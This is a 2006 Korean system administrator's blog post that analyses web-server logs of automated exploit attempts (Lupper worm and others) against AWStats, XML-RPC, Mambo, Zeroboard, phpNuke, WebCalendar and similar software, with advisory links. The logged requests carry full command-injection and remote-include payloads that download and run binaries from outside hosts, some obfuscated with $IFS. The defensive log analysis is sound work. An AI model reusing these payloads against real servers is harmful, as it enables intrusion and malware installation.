Coffeenix: a resting place for system engineers, *NIX with the aroma of coffee
  Web log analysis of web attacks (added 3.22)    Posted: 2006/03/15 23:43

  • Author: 좋은진호 ( http://coffeenix.net/ )
  • Views: 95340
    Title    : Web log analysis of web attacks
    Author   : 좋은진호 (truefeel, http://coffeenix.net/ )
    Written  : 2006.1.20 (Fri)~
    Compiled : 2006.3.14 (Tue)
    Revised  : 2006.3.22 (Wed)

    You will remember that from late 2004 to early 2005, website defacements surged because of
    vulnerabilities in Zeroboard, Technote, phpBB and others, and because of PHP configuration problems.
    Most such attacks are carried out with worms or automated tools, and the logs analyzed here were
    also left by automated attack tools.
    The web logs analyzed(?) here cover attacks exploiting vulnerabilities in the web log analysis tool
    AWStats, and in WordPress, TikiWiki, Drupal, PHPGroupWare, Webhints, Zeroboard, the CMS tool Mambo,
    the traffic analysis tool Cacti, and others.

    These web logs were not gathered from elsewhere; they are logs left on my own server, separated out and posted. Some IPs are shown as xxx.xxx.

    In case someone running a server for the first time reads this and panics, thinking 'Whoa!! Our
    server was attacked too, this is serious', let me say this up front. If you do not run the public
    programs listed above there is nothing to worry about, and even if you do, you are fine as long as
    you run the latest security-patched version (although undisclosed vulnerabilities also exist).
    Also, if the log shows HTTP/1.? 404, it was only an attack attempt and not a compromise, so you
    can rest easy.

    ※ The tables in this particular article display best in MSIE.

    1. Attack exploiting a vulnerability in the web log analysis tool AWStats

     
    203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:05 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:06 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : Hong Kong (HK, 203.194.128.0 - 203.194.255.255)

    References:
    * AWStats "configdir" Parameter Arbitrary Command Execution
      http://secunia.com/advisories/13893
    * AWStats Remote Command Execution Vulnerability
      http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185

    2. Attack exploiting the Remote Code Injection vulnerability in XML-RPC for PHP

     
    203.194.xxx.xx - - [17/Jan/2006:02:09:09 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:10 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:11 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:12 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:13 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:14 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:15 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:17 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:18 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 0
     


    - IP : Hong Kong (HK, 203.194.128.0 - 203.194.255.255)
    - This vulnerability exists in XML-RPC for PHP before 1.1;
      programs such as WordPress, TikiWiki, Drupal and PHPGroupWare have the related vulnerability as well.
    - The Linux/Lupper worm exploits the XML-RPC vulnerability, the AWStats vulnerability and the
      Darryl Burgdorf Webhints vulnerability. It is also called the Lupii worm.
    - This worm (including its variants) automatically sends malicious requests to the web port as shown
      above, and if the server has a vulnerable script installed, it downloads a file from a remote
      location and executes it.

    References:
    * XML-RPC for PHP Nested XML Tags PHP Code Execution
      http://secunia.com/advisories/16431/
    * PEAR XML_RPC Nested XML Tags PHP Code Execution
      http://secunia.com/advisories/16429/
    * Linux/Lupper.worm
      http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
      http://vil.nai.com/vil/content/v_136821.htm

    3. Attack exploiting the XML-RPC vulnerability (2)

     
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
     


    - IP : Korea (CATV user, 218.232.96.128-218.232.96.255)

    4. Attack exploiting the Darryl Burgdorf Webhints vulnerability

     
    219.239.xxx.xx - - [20/Dec/2005:04:17:10 +0900] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:11 +0900] "GET /scgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:12 +0900] "GET /includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:14 +0900] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:15 +0900] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:16 +0900] "GET /cgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:17 +0900] "GET /scgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:18 +0900] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:19 +0900] "GET /scgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:20 +0900] "GET /cgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:21 +0900] "GET /scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:22 +0900] "GET /hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:23 +0900] "GET /cgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:25 +0900] "GET /scgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:26 +0900] "GET /cgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:27 +0900] "GET /scgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:28 +0900] "GET /hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:29 +0900] "GET /cgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:30 +0900] "GET /scgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:31 +0900] "GET /webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:32 +0900] "GET /cgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:33 +0900] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:35 +0900] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:36 +0900] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:37 +0900] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:38 +0900] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:39 +0900] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:40 +0900] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:41 +0900] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:42 +0900] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:43 +0900] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:45 +0900] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:46 +0900] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
     


    5. Attack exploiting a vulnerability in the CMS tool Mambo

     
    213.203.xxx.xx - - [10/Jan/2006:17:59:50 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:54 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:57 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:58 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:18:00:00 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:18:00:02 +0900] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
     


    - IP : Italy (IT, 213.203.161.0 - 213.203.161.255)

    6. Attack exploiting a vulnerability in Zeroboard's zero_vote theme

     
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /board/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:34 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:48 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:49 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
     


    - IP : Korea (Seoul Goeun Elementary School, 211.42.90.0-211.42.90.127)

    References:
    * Zeroboard security vulnerabilities (in Korean)
      http://bbs.kldp.org/viewtopic.php?p=218132
    * STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
      http://www.securityfocus.com/archive/1/387076
    * Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitrary Commands
      http://securitytracker.com/alerts/2005/Jan/1012812.html
    * Application Attack Analysis (PHP Application Mass Attack) (in Korean, 2005.1.8)
      http://www.scieng.net/zero/data/pds/1105342062/Application_Attack_Analysis(PHP).pdf

    7. Attack exploiting a phpNuke vulnerability

     
    216.72.xxx.xxx - - [07/Jan/2006:09:44:59 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 0

    200.75.xx.xx - - [06/Jan/2006:10:16:44 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:46 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:47 +0900] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:49 +0900] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : United States (US, 216.72.0.0 - 216.72.255.255)
           Colombia (CO, 200.75.46.32/27)

    8. Attack exploiting a vulnerability in the Coppermine photo gallery module of phpNuke/postNuke

     
    200.75.xx.xx - - [06/Jan/2006:10:16:50 +0900] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:52 +0900] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : Colombia (CO, 200.75.46.32/27)
    - The THEME_DIR parameter is not checked, so script code from internal or external files can be included.

    References:
    * phpNuke/postNuke Coppermine Photo Gallery Module Multiple Vulnerabilities
      http://secunia.com/advisories/11524/

    9. Attack exploiting an Open WebMail vulnerability (judged to be requests made to find out whether a vulnerable version is installed)

     
    203.190.xxx.xxx - - [01/Feb/2006:01:51:25 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    203.190.xxx.xxx - - [01/Feb/2006:01:52:32 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
     


    - IP : Bangladesh (BD, 203.190.254.0 - 203.190.255.255)

    10. Attack exploiting an Ikonboard vulnerability

     
    211.217.xx.xx - - [22/Feb/2006:08:06:25 +0900] "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http://www.members.lycos.co.uk/botperl/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20www.members.lycos.co.uk/botperl/botperl;perl%20botperl HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : Korea (Next Information, 211.217.75.26-211.217.75.26)

    11. Attack exploiting the send_reminders.php vulnerability in WebCalendar

     
    65.203.xxx.xxx - - [05/Dec/2005:02:34:23 +0900] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:27 +0900] "GET /cacti/include/config_settings.php?config[include_path]=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /calendar/tools/send_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:29 +0900] "GET /webcalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:31 +0900] "GET /WebCalendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0
    65.203.xxx.xxx - - [05/Dec/2005:02:34:32 +0900] "GET /calendar/ws/get_reminders.php?includedir=http://www.geocities.com/trustopt/t.txt? HTTP/1.1" 404 0

    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /WebCalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:27 +0900] "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /cal/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:28 +0900] "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.180.xxx.xx - - [22/Feb/2006:21:31:29 +0900] "GET /calendar/tools/send_reminders.php HTTP/1.1" 404 0 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : UUNET (65.203.134.96 - 65.203.134.111)
           United States (US, 216.180.224.0 - 216.180.255.255)
    - WebCalendar versions lower than 1.0.1 have a vulnerability in send_reminders.php that allows a remote file to be included.

    References:
    * WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
      http://www.securityfocus.com/bid/14651

    12. Attack exploiting the graph_image.php vulnerability in Cacti, the RRDtool-based traffic analysis tool

     
    66.14.xxx.xx - - [01/Dec/2005:01:03:22 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
    216.127.xx.xxx - - [23/Dec/2005:19:57:31 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
    208.171.xxx.xxx - - [24/Dec/2005:02:13:41 +0900] "GET /cacti/graph_image.php HTTP/1.1" 404 0
     


    - IP : United States (US, 216.127.64.0 - 216.127.95.255)
           United States (US, 208.169.96.0 - 208.173.191.255)

    References:
    * RaXnet Cacti Graph_Image.PHP Remote Command Execution Vulnerability
      http://www.securityfocus.com/bid/14042/

    13. Log left by the ATD OpenSSL vulnerability scanning tool

     
    11.53.xxx.x - - [01/Dec/2005:00:49:31 +0900] "GET /sumthin HTTP/1.0" 404 0
     


    - IP : United States (US, 11.0.0.0 - 11.255.255.255)

    References:
    * Analysis of the ATD OpenSSL Mass Exploiter
      http://www.lurhq.com/atd.html
    * ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)
      http://seclists.org/lists/incidents/2003/Apr/0059.html

    * /sumthin Solved
      http://www.webmasterworld.com/forum11/2100.htm
      http://www.webmasterworld.com/forum39/782.htm

    14. Attack exploiting a very old (2001) HTTP vulnerability in Cisco switches

     
    211.115.xxx.xx - - [27/Feb/2006:13:39:22 +0900] "GET /level/16/exec/-///pwd  HTTP/1.0" 404 0 "-"
